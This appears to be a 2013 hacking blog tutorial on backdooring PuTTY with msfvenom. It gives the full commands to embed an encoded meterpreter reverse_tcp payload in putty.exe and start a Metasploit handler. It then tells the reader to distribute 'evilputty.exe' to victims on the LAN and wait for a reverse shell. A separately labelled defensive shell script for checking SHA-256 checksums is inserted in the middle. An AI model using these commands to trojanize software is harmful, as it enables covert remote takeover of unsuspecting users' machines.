Friday, 16 August 2013

How To Backdoor Windows Executables Using Metasploit's Plugin Msfvenom


In this tutorial, I will show you how to backdoor Windows executables using Msfvenom, a plugin of the Metasploit Exploitation Framework.

For LAN/Wifi Networks:

Now follow me step by step:

Attacker's IP: 192.168.0.14
Victim's IP: 192.168.0.x (within LAN network it might be any IP)


1- Open a terminal and download PuTTY using wget.

wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in the root directory when I used the above command, so putty.exe was downloaded to the /root/ directory.
Now use msfvenom to backdoor this executable with the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=4444 > evilputty.exe

The above command will generate an EXE file named evilputty.exe. This is our backdoored executable file.

3- Start Metasploit.

msfconsole

4- Start Metasploit's reverse handler to get a reverse connection.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.14
set LPORT 4444
exploit


5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for the victim. When the victim opens evilputty.exe, you will get a reverse shell on your Metasploit handler. Happy Hacking :)
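Seen from the receiving side, a copy of putty.exe that has had anything added to it cannot have the same SHA-256 as the publisher's original, so checking a received file against the publisher's checksum list exposes it before it is run. The script below is an added example, not part of the original tutorial; the function names, the file received.exe and the file contents are constructed, and it assumes a checksum list in sha256sum format obtained from the publisher over a trusted channel.

```shell
#!/bin/sh
# Added defensive example. File names and contents below are constructed.

# verify_against_list FILE SUMS_FILE [NAME]
# SUMS_FILE uses the sha256sum layout: <64 hex digits> <name>, one per line.
# NAME is the entry to look up (default: FILE's basename), so a renamed copy
# can still be checked against the entry for the original name.
# Names containing spaces are not handled.
# Returns 0 on match, 1 on mismatch, 2 if the entry or a file is missing.
verify_against_list() {
    file=$1 sums=$2 name=${3:-$(basename "$1")}
    [ -r "$file" ] && [ -r "$sums" ] || return 2
    expected=$(awk -v n="$name" '
        { f = $2; sub(/^\*/, "", f) }   # binary-mode entries read "*name"
        f == n && length($1) == 64 { print tolower($1); exit }' "$sums")
    [ -n "$expected" ] || return 2
    actual=$(sha256sum "$file" | awk '{ print $1 }')
    [ "$actual" = "$expected" ]
}

# Builds a stand-in original, its checksum list and an altered copy in a
# temporary directory, then reports the result code of each check.
demo() {
    dir=$(mktemp -d) || return 2
    printf 'constructed stand-in for the vendor binary\n' > "$dir/putty.exe"
    # Stand-in for the publisher's list; a real one must not come from
    # whoever handed you the executable.
    ( cd "$dir" && sha256sum putty.exe > sha256sums )
    # A copy with bytes appended, standing in for any modified build.
    cp "$dir/putty.exe" "$dir/received.exe"
    printf 'extra bytes' >> "$dir/received.exe"

    r1=0; verify_against_list "$dir/putty.exe" "$dir/sha256sums" || r1=$?
    r2=0; verify_against_list "$dir/received.exe" "$dir/sha256sums" putty.exe || r2=$?
    r3=0; verify_against_list "$dir/received.exe" "$dir/sha256sums" || r3=$?
    rm -rf "$dir"
    echo "original=$r1 modified=$r2 unlisted=$r3"
}

demo
```

A result of 2 means the file could not be checked at all and should be treated the same as a mismatch.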

For WAN Or Internet:

To use this method over WAN/Internet, you need to forward your ports.
See my following tutorial for a better understanding of how Metasploit works over the internet.

Hacking Remote Machines Using Firefox Bootstrapped Addon Of Metasploit Over WAN (Internet)

Author:
Captain & exploiter-z from Pak Mad Hunters
